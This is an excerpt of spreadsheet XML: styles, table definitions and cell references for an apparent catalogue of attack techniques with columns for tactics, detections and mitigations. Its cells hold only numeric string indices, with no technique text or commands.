    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="43">
    <dxf>
      <numFmt numFmtId="0" formatCode="Genera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border outline="0">
        <top style="thin">
          <color theme="1"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <alignment horizontal="left" vertical="top" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <border outline="0">
        <bottom style="thin">
          <color theme="1"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color auto="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7030A0"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <border diagonalUp="0" diagonalDown="0" outline="0">
        <left style="thin">
          <color auto="1"/>
        </left>
        <right style="thin">
          <color auto="1"/>
        </right>
        <top/>
        <bottom/>
      </border>
    </dxf>
    <dxf>
      <alignment horizontal="left" vertical="top" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <border diagonalUp="0" diagonalDown="0">
        <left style="thin">
          <color auto="1"/>
        </left>
        <right/>
        <top style="thin">
          <color auto="1"/>
        </top>
        <bottom style="thin">
          <color auto="1"/>
        </bottom>
        <vertical/>
        <horizontal/>
      </border>
    </dxf>
    <dxf>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left" vertical="top"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alignment horizontal="left" vertical="top" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <border outline="0">
        <bottom style="thin">
          <color auto="1"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>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0C6443-BBBC-433D-A5B6-8CFFE3183566}" name="Table1" displayName="Table1" ref="A1:O2125" totalsRowShown="0" headerRowDxfId="42" dataDxfId="40" headerRowBorderDxfId="41" tableBorderDxfId="39" totalsRowBorderDxfId="38">
  <autoFilter ref="A1:O2125" xr:uid="{50EA4037-FA9D-4EAB-8682-1EC2628CB193}"/>
  <tableColumns count="15">
    <tableColumn id="1" xr3:uid="{61233730-A832-4F68-884D-924ADD1CC581}" name="ID" dataDxfId="37"/>
    <tableColumn id="2" xr3:uid="{E919A969-95D7-410B-A379-13C9911796AB}" name="Name" dataDxfId="36"/>
    <tableColumn id="3" xr3:uid="{FCA75018-AC63-4BFA-ABA9-B63CC5A8C435}" name="Tactic" dataDxfId="35"/>
    <tableColumn id="4" xr3:uid="{071BDECA-FEAC-4A72-A74A-0D45FE174BD5}" name="Tool" dataDxfId="34"/>
    <tableColumn id="5" xr3:uid="{C1BE9ABC-F2C9-4A1C-A0DD-7395CADD8874}" name="Description" dataDxfId="33"/>
    <tableColumn id="6" xr3:uid="{42D3F0A0-694F-4558-ACD1-15C9B9A96858}" name="Data Source" dataDxfId="32"/>
    <tableColumn id="7" xr3:uid="{73699789-F085-4EDA-8D6B-4444EFED004B}" name="Bypass" dataDxfId="31"/>
    <tableColumn id="8" xr3:uid="{1E0930C1-C5C0-4744-B9DB-7E444BE304C7}" name="Analytic Details" dataDxfId="30"/>
    <tableColumn id="9" xr3:uid="{F176D6E0-659A-43CC-BC39-8C235216A39B}" name="Mitigation" dataDxfId="29"/>
    <tableColumn id="10" xr3:uid="{7B7C99B6-EA1D-4FEF-9D6A-26F9A4936660}" name="Platform" dataDxfId="28"/>
    <tableColumn id="11" xr3:uid="{0EF8A07D-4CF0-4C98-838F-A4F191EA0C3F}" name="Requires Permission" dataDxfId="27"/>
    <tableColumn id="12" xr3:uid="{D0538B77-624C-4E16-8826-F42E9AED3375}" name="Requires System" dataDxfId="26"/>
    <tableColumn id="13" xr3:uid="{E0D8FFF9-4859-438A-836A-CA169338F9EE}" name="CAPEC ID" dataDxfId="25"/>
    <tableColumn id="14" xr3:uid="{E6691901-72B0-4633-8F54-0EFA219FE7A7}" name="Contributor" dataDxfId="24"/>
    <tableColumn id="15" xr3:uid="{5436A6CC-04C9-43BA-B076-AA68A9E4974A}" name="URL" dataDxfId="23"/>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035CAD3-8F54-41D1-BEFA-6761BC97EB87}" name="Table13" displayName="Table13" ref="A1:M189" totalsRowShown="0" headerRowDxfId="22" dataDxfId="21">
  <autoFilter ref="A1:M189" xr:uid="{50EA4037-FA9D-4EAB-8682-1EC2628CB193}">
    <filterColumn colId="9">
      <filters>
        <filter val="Linux,macOS"/>
        <filter val="Linux,macOS,Windows"/>
        <filter val="Linux,Windows,macOS"/>
        <filter val="macOS"/>
        <filter val="macOS,Windows"/>
        <filter val="Windows,macOS"/>
      </filters>
    </filterColumn>
  </autoFilter>
  <tableColumns count="13">
    <tableColumn id="1" xr3:uid="{73517770-8CF2-4900-9478-19AEFE7B0551}" name="ID" dataDxfId="20"/>
    <tableColumn id="2" xr3:uid="{202C29CE-A381-4318-822D-E959F4488CAC}" name="Name" dataDxfId="19"/>
    <tableColumn id="3" xr3:uid="{1FA2B2EB-D651-47D3-B879-50D931BDCB0A}" name="Tactic" dataDxfId="18"/>
    <tableColumn id="4" xr3:uid="{901B5A38-AA7F-49DD-8D19-F0AEC875AC97}" name="Tool" dataDxfId="17"/>
    <tableColumn id="5" xr3:uid="{8103A5E3-1CE5-497E-8A60-0D54E0FAF2D1}" name="Description" dataDxfId="16"/>
    <tableColumn id="6" xr3:uid="{BECA9F21-CB31-401B-9DBD-0D2DA6E4C3A6}" name="Data Source" dataDxfId="15"/>
    <tableColumn id="7" xr3:uid="{637B18B2-7058-4E6A-BC35-80C5BC7D5058}" name="Bypass" dataDxfId="14"/>
    <tableColumn id="8" xr3:uid="{5892959B-8834-463F-827D-64A01436880F}" name="Analytic Details" dataDxfId="13"/>
    <tableColumn id="9" xr3:uid="{C0A9DF2A-3003-4BB7-A072-D42E9E10B9CE}" name="Mitigation" dataDxfId="12"/>
    <tableColumn id="10" xr3:uid="{71171696-F6CB-44E2-B9FE-D0E23E95EB37}" name="Platform" dataDxfId="11"/>
    <tableColumn id="11" xr3:uid="{2B4F4E51-288C-4430-93AE-E380F2B0008C}" name="Requires Permission" dataDxfId="10"/>
    <tableColumn id="12" xr3:uid="{08DDF7F4-FBDF-4F97-B00B-746C6D517922}" name="Requires System" dataDxfId="9"/>
    <tableColumn id="15" xr3:uid="{AD1C765B-4D59-4B0D-81BA-3237D34E08F6}" name="URL" dataDxfId="8"/>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C80334E-6E30-4D6B-98B1-FE37474AEA15}" name="Table8" displayName="Table8" ref="A1:E90" totalsRowShown="0" headerRowDxfId="7" dataDxfId="5" headerRowBorderDxfId="6" tableBorderDxfId="4">
  <autoFilter ref="A1:E90" xr:uid="{8804FE49-136C-4A34-93DA-5AE0314A493A}"/>
  <tableColumns count="5">
    <tableColumn id="1" xr3:uid="{D2224E30-6D9F-48C4-851B-9F44D1527132}" name="ID" dataDxfId="3"/>
    <tableColumn id="2" xr3:uid="{FFE1987F-61A9-46C0-A868-B61AF3E31E19}" name="Name" dataDxfId="2"/>
    <tableColumn id="3" xr3:uid="{8C3A3556-940D-41BD-BBF4-80FD66307284}" name="Tactic" dataDxfId="1"/>
    <tableColumn id="4" xr3:uid="{8CD371F3-CDCC-4473-AA07-22785BEDD9F0}" name="Tests Exist" dataDxfId="0">
      <calculatedColumnFormula>IF(LEN(E2)&gt;0,"yes","no")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="5" xr3:uid="{0BB01460-87F9-422A-8913-F09B9177A97F}" name="Test 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2125"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B2" sqref="B2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11" defaultRowHeight="15.75" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="15.375" customWidth="1"/>
    <col min="2" max="2" width="21.875" customWidth="1"/>
    <col min="3" max="3" width="13.875" customWidth="1"/>
    <col min="4" max="4" width="33.375" customWidth="1"/>
    <col min="5" max="5" width="128.5" customWidth="1"/>
    <col min="6" max="6" width="66.625" customWidth="1"/>
    <col min="7" max="7" width="29.625" customWidth="1"/>
    <col min="8" max="8" width="125" customWidth="1"/>
    <col min="9" max="9" width="115" customWidth="1"/>
    <col min="10" max="10" width="19.625" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="20.625" customWidth="1"/>
    <col min="12" max="12" width="52" customWidth="1"/>
    <col min="13" max="13" width="13" customWidth="1"/>
    <col min="14" max="14" width="18" customWidth="1"/>
    <col min="15" max="15" width="39.625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:15" s="14" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A1" s="11" t="s">
        <v>3191</v>
      </c>
      <c r="B1" s="12" t="s">
        <v>3192</v>
      </c>
      <c r="C1" s="12" t="s">
        <v>0</v>
      </c>
      <c r="D1" s="12" t="s">
        <v>5</v>
      </c>
      <c r="E1" s="12" t="s">
        <v>6</v>
      </c>
      <c r="F1" s="12" t="s">
        <v>7</v>
      </c>
      <c r="G1" s="12" t="s">
        <v>8</v>
      </c>
      <c r="H1" s="12" t="s">
        <v>9</v>
      </c>
      <c r="I1" s="12" t="s">
        <v>10</v>
      </c>
      <c r="J1" s="12" t="s">
        <v>11</v>
      </c>
      <c r="K1" s="12" t="s">
        <v>12</v>
      </c>
      <c r="L1" s="12" t="s">
        <v>13</v>
      </c>
      <c r="M1" s="12" t="s">
        <v>14</v>
      </c>
      <c r="N1" s="12" t="s">
        <v>15</v>
      </c>
      <c r="O1" s="13" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="2" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A2" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B2" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D2" s="1"/>
      <c r="E2" s="1" t="s">
        <v>22</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G2" s="1"/>
      <c r="H2" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I2" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K2" s="1"/>
      <c r="L2" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M2" s="1"/>
      <c r="N2" s="1"/>
      <c r="O2" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="3" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A3" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>32</v>
      </c>
      <c r="E3" s="1" t="s">
        <v>33</v>
      </c>
      <c r="F3" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G3" s="1"/>
      <c r="H3" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I3" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J3" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K3" s="1"/>
      <c r="L3" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M3" s="1"/>
      <c r="N3" s="1"/>
      <c r="O3" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="4" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>37</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>38</v>
      </c>
      <c r="F4" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G4" s="1"/>
      <c r="H4" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I4" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J4" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K4" s="1"/>
      <c r="L4" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M4" s="1"/>
      <c r="N4" s="1"/>
      <c r="O4" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="5" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>42</v>
      </c>
      <c r="E5" s="1" t="s">
        <v>43</v>
      </c>
      <c r="F5" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G5" s="1"/>
      <c r="H5" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I5" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J5" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K5" s="1"/>
      <c r="L5" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M5" s="1"/>
      <c r="N5" s="1"/>
      <c r="O5" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="6" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>3004</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>44</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D6" s="1"/>
      <c r="E6" s="1" t="s">
        <v>48</v>
      </c>
      <c r="F6" s="1" t="s">
        <v>49</v>
      </c>
      <c r="G6" s="1"/>
      <c r="H6" s="1" t="s">
        <v>50</v>
      </c>
      <c r="I6" s="1" t="s">
        <v>51</v>
      </c>
      <c r="J6" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K6" s="1"/>
      <c r="L6" s="1"/>
      <c r="M6" s="1"/>
      <c r="N6" s="1"/>
      <c r="O6" s="4" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="7" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>3004</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>44</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>56</v>
      </c>
      <c r="E7" s="1" t="s">
        <v>57</v>
      </c>
      <c r="F7" s="1" t="s">
        <v>49</v>
      </c>
      <c r="G7" s="1"/>
      <c r="H7" s="1" t="s">
        <v>50</v>
      </c>
      <c r="I7" s="1" t="s">
        <v>51</v>
      </c>
      <c r="J7" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K7" s="1"/>
      <c r="L7" s="1"/>
      <c r="M7" s="1"/>
      <c r="N7" s="1"/>
      <c r="O7" s="4" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="8" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E8" s="1" t="s">
        <v>59</v>
      </c>
      <c r="F8" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G8" s="1"/>
      <c r="H8" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I8" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J8" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K8" s="1"/>
      <c r="L8" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M8" s="1"/>
      <c r="N8" s="1"/>
      <c r="O8" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="9" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D9" s="1"/>
      <c r="E9" s="1" t="s">
        <v>63</v>
      </c>
      <c r="F9" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G9" s="1"/>
      <c r="H9" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I9" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J9" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K9" s="1"/>
      <c r="L9" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M9" s="1"/>
      <c r="N9" s="1"/>
      <c r="O9" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="10" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D10" s="1"/>
      <c r="E10" s="1" t="s">
        <v>67</v>
      </c>
      <c r="F10" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G10" s="1"/>
      <c r="H10" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I10" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J10" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K10" s="1"/>
      <c r="L10" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M10" s="1"/>
      <c r="N10" s="1"/>
      <c r="O10" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="11" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D11" s="1"/>
      <c r="E11" s="1" t="s">
        <v>71</v>
      </c>
      <c r="F11" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G11" s="1"/>
      <c r="H11" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I11" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J11" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K11" s="1"/>
      <c r="L11" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M11" s="1"/>
      <c r="N11" s="1"/>
      <c r="O11" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="12" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D12" s="1"/>
      <c r="E12" s="1" t="s">
        <v>75</v>
      </c>
      <c r="F12" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G12" s="1"/>
      <c r="H12" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I12" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J12" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K12" s="1"/>
      <c r="L12" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M12" s="1"/>
      <c r="N12" s="1"/>
      <c r="O12" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="13" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>79</v>
      </c>
      <c r="E13" s="1" t="s">
        <v>80</v>
      </c>
      <c r="F13" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G13" s="1"/>
      <c r="H13" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I13" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J13" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K13" s="1"/>
      <c r="L13" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M13" s="1"/>
      <c r="N13" s="1"/>
      <c r="O13" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="14" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>37</v>
      </c>
      <c r="E14" s="1" t="s">
        <v>38</v>
      </c>
      <c r="F14" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G14" s="1"/>
      <c r="H14" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I14" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J14" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K14" s="1"/>
      <c r="L14" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M14" s="1"/>
      <c r="N14" s="1"/>
      <c r="O14" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="15" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D15" s="1"/>
      <c r="E15" s="1" t="s">
        <v>84</v>
      </c>
      <c r="F15" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G15" s="1"/>
      <c r="H15" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I15" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J15" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K15" s="1"/>
      <c r="L15" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M15" s="1"/>
      <c r="N15" s="1"/>
      <c r="O15" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="16" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>88</v>
      </c>
      <c r="E16" s="1" t="s">
        <v>89</v>
      </c>
      <c r="F16" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G16" s="1"/>
      <c r="H16" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I16" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J16" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K16" s="1"/>
      <c r="L16" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M16" s="1"/>
      <c r="N16" s="1"/>
      <c r="O16" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="17" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>3003</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D17" s="1"/>
      <c r="E17" s="1" t="s">
        <v>93</v>
      </c>
      <c r="F17" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G17" s="1"/>
      <c r="H17" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I17" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J17" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K17" s="1"/>
      <c r="L17" s="1" t="s">
        <v>27</v>
      </c>
      <c r="M17" s="1"/>
      <c r="N17" s="1"/>
      <c r="O17" s="4" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="18" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>3004</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>44</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>37</v>
      </c>
      <c r="E18" s="1" t="s">
        <v>94</v>
      </c>
      <c r="F18" s="1" t="s">
        <v>49</v>
      </c>
      <c r="G18" s="1"/>
      <c r="H18" s="1" t="s">
        <v>50</v>
      </c>
      <c r="I18" s="1" t="s">
        <v>51</v>
      </c>
      <c r="J18" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K18" s="1"/>
      <c r="L18" s="1"/>
      <c r="M18" s="1"/>
      <c r="N18" s="1"/>
      <c r="O18" s="4" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="19" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>3004</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>44</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>98</v>
      </c>
      <c r="E19" s="1" t="s">
        <v>99</v>
      </c>
      <c r="F19" s="1" t="s">
        <v>49</v>
      </c>
      <c r="G19" s="1"/>
      <c r="H19" s="1" t="s">
        <v>50</v>
      </c>
      <c r="I19" s="1" t="s">
        <v>51</v>
      </c>
      <c r="J19" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K19" s="1"/>
      <c r="L19" s="1"/>
      <c r="M19" s="1"/>
      <c r="N19" s="1"/>
      <c r="O19" s="4" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="20" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>3004</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>44</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>103</v>
      </c>
      <c r="E20" s="1" t="s">
        <v>104</v>
      </c>
      <c r="F20" s="1" t="s">
        <v>49</v>
      </c>
      <c r="G20" s="1"/>
      <c r="H20" s="1" t="s">
        <v>50</v>
      </c>
      <c r="I20" s="1" t="s">
        <v>51</v>
      </c>
      <c r="J20" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K20" s="1"/>
      <c r="L20" s="1"/>
      <c r="M20" s="1"/>
      <c r="N20" s="1"/>
      <c r="O20" s="4" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="21" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>3004</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>44</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>108</v>
      </c>
      <c r="E21" s="1" t="s">
        <v>109</v>
      </c>
      <c r="F21" s="1" t="s">
        <v>49</v>
      </c>
      <c r="G21" s="1"/>
      <c r="H21" s="1" t="s">
        <v>50</v>
      </c>
      <c r="I21" s="1" t="s">
        <v>51</v>
      </c>
      <c r="J21" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K21" s="1"/>
      <c r="L21" s="1"/>
      <c r="M21" s="1"/>
      <c r="N21" s="1"/>
      <c r="O21" s="4" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="22" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>3004</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>44</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>79</v>
      </c>
      <c r="E22" s="1" t="s">
        <v>110</v>
      </c>
      <c r="F22" s="1" t="s">
        <v>49</v>
      </c>
      <c r="G22" s="1"/>
      <c r="H22" s="1" t="s">
        <v>50</v>
      </c>
      <c r="I22" s="1" t="s">
        <v>51</v>
      </c>
      <c r="J22" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K22" s="1"/>
      <c r="L22" s="1"/>
      <c r="M22" s="1"/>
      <c r="N22" s="1"/>
      <c r="O22" s="4" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="23" spans="1:15" ht="157.5" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>3005</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>111</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>112</v>
      </c>
      <c r="E23" s="1" t="s">
        <v>113</v>
      </c>
      <c r="F23" s="1" t="s">
        <v>114</v>
      </c>
      <c r="G23" s="1"/>
      <c r="H23" s="2" t="s">
        <v>115</v>
      </c>
      <c r="I23" s="2" t="s">
        <v>116</v>
      </c>
      <c r="J23" s="1" t="s">
        <v>117</v>
      </c>
      <c r="K23" s="1"/>
      <c r="L23" s="1"/>
      <c r="M23" s="1"/>
      <c r="N23" s="1"/>
      <c r="O23" s="4" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="24" spans="1:15" ht="157.5" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>3005</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>111</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>122</v>
      </c>
      <c r="E24" s="1" t="s">
        <v>123</v>
      </c>
      <c r="F24" s="1" t="s">
        <v>114</v>
      </c>
      <c r="G24" s="1"/>
      <c r="H24" s="2" t="s">
        <v>115</v>
      </c>
      <c r="I24" s="2" t="s">
        <v>116</v>
      </c>
      <c r="J24" s="1" t="s">
        <v>117</v>
      </c>
      <c r="K24" s="1"/>
      <c r="L24" s="1"/>
      <c r="M24" s="1"/>
      <c r="N24" s="1"/>
      <c r="O24" s="4" t="s">
        <v>118</v>
      </c>
    </row>
